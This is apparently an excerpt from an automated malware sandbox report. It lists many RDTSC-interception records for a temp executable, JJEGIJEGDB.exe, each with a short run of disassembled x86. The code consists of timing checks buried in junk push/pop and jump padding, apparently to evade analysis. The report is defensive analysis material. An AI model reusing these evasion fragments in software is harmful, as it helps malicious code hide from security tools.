                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C253F5 second address: C25454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b push eax 0x0000000c sub edi, dword ptr [ebp+122D35B5h] 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F34D94219D8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 mov ebx, esi 0x00000034 pop edi 0x00000035 sub edi, 4A2BFA36h 0x0000003b push eax 0x0000003c pushad 0x0000003d jl 00007F34D94219D8h 0x00000043 pushad 0x00000044 jo 00007F34D94219D6h 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C26319 second address: C2631F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C27237 second address: C272A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F34D94219E4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F34D94219D8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov bx, dx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F34D94219D8h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C272A6 second address: C272AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2A846 second address: C2A861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E7h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2A861 second address: C2A870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2A870 second address: C2A87E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C25555 second address: C2555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C26520 second address: C2652B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D94219D6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2A87E second address: C2A884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C29926 second address: C29941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219E6h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2652B second address: C26530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C26530 second address: C26598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov dword ptr [ebp+122D2716h], eax 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e or dword ptr [ebp+122D23B2h], ecx 0x00000024 mov eax, dword ptr [ebp+122D139Dh] 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F34D94219D8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 and ebx, 40C7A673h 0x0000004a push FFFFFFFFh 0x0000004c mov edi, dword ptr [ebp+122D3601h] 0x00000052 nop 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 jl 00007F34D94219D6h 0x0000005d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C26598 second address: C265AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2BA5E second address: C2BA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2F9B4 second address: C2F9B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2BA62 second address: C2BA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2BB4C second address: C2BB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C31B61 second address: C31B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C31B65 second address: C31B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C34CC4 second address: C34CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F34D94219E8h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F34D94219DEh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2EB2D second address: C2EB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2DB17 second address: C2DB2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F34D94219E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2DB2C second address: C2DB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2DB39 second address: C2DB47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C2DC0F second address: C2DC1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F34D8F44CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C32D02 second address: C32D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C34F71 second address: C34F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC8h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C3E07B second address: C3E0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F34D94219E8h 0x0000000c pushad 0x0000000d jg 00007F34D94219D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C3E0A3 second address: C3E0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C440B0 second address: C440DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F34D94219DAh 0x00000012 jbe 00007F34D94219D6h 0x00000018 popad 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C440DB second address: C440E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F34D8F44CB6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C440E5 second address: C440E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C440E9 second address: C44134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007F34D8F44CC1h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jno 00007F34D8F44CB6h 0x00000023 popad 0x00000024 ja 00007F34D8F44CB8h 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jnl 00007F34D8F44CBCh 0x00000037 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C44134 second address: C4413A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C4413A second address: C4413E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C4908C second address: C49090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C49090 second address: C49094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C49094 second address: C490BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F34D94219F6h 0x0000000c jmp 00007F34D94219E2h 0x00000011 jbe 00007F34D94219DEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C485EC second address: C48607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C48607 second address: C4860B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C4860B second address: C4860F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C488C6 second address: C488CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C488CC second address: C48903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F34D8F44CC6h 0x0000000e pop ecx 0x0000000f jmp 00007F34D8F44CBFh 0x00000014 jnp 00007F34D8F44CBCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C4DF1A second address: C4DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1B579 second address: C1B592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1B592 second address: C1B596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1C179 second address: C1C17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1C17F second address: C1C19B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F34D94219DAh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1C19B second address: C1C19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1C19F second address: C1C231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 movzx ebx, di 0x0000000c js 00007F34D94219DCh 0x00000012 mov ebx, dword ptr [ebp+122D3555h] 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp+1246FC53h] 0x0000001f mov dword ptr [ebp+122D1F4Eh], ebx 0x00000025 push eax 0x00000026 jnc 00007F34D94219DAh 0x0000002c mov dword ptr [esp], eax 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F34D94219D8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 jmp 00007F34D94219DAh 0x0000004e lea eax, dword ptr [ebp+1246FC0Fh] 0x00000054 push 00000000h 0x00000056 push esi 0x00000057 call 00007F34D94219D8h 0x0000005c pop esi 0x0000005d mov dword ptr [esp+04h], esi 0x00000061 add dword ptr [esp+04h], 00000015h 0x00000069 inc esi 0x0000006a push esi 0x0000006b ret 0x0000006c pop esi 0x0000006d ret 0x0000006e mov edi, dword ptr [ebp+122D1FCAh] 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1C231 second address: C1C237 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C1C237 second address: C0664D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cx, di 0x0000000e call dword ptr [ebp+122D27D0h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F34D94219D6h 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C4DAB2 second address: C4DAB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C524A7 second address: C524CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E8h 0x00000007 jc 00007F34D94219D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C52BB0 second address: C52BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C52BC6 second address: C52BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F34D94219D6h 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C52D40 second address: C52D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC9h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5323E second address: C53244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C53244 second address: C53255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F34D8F44CB6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C53255 second address: C5327A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F34D94219E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F34D94219DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C51C2B second address: C51C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F34D8F44CBFh 0x0000000a jmp 00007F34D8F44CC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5A7FB second address: C5A7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5A942 second address: C5A946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5AD2B second address: C5AD30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5A525 second address: C5A52F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F34D8F44CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5A52F second address: C5A538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5B11E second address: C5B14F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D8F44CD1h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F34D8F44CC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F34D8F44CB6h 0x00000017 jng 00007F34D8F44CB6h 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5B14F second address: C5B153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C5F08C second address: C5F091 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C61B90 second address: C61B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C61B94 second address: C61B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C61B98 second address: C61BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F34D94219F5h 0x00000011 je 00007F34D94219D6h 0x00000017 jmp 00007F34D94219E9h 0x0000001c jo 00007F34D94219F5h 0x00000022 jne 00007F34D94219D6h 0x00000028 jmp 00007F34D94219E9h 0x0000002d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C61BED second address: C61C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F34D8F44CB6h 0x0000000a jmp 00007F34D8F44CBEh 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C63F16 second address: C63F1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C665CE second address: C665D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C665D5 second address: C665DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C665DC second address: C665E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6C9E0 second address: C6CA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F34D94219D6h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jmp 00007F34D94219E4h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jns 00007F34D94219D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: C6CA0F second address: C6CA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F34D8F44CB6h 0x0000000c popad 0x0000000d rdtsc
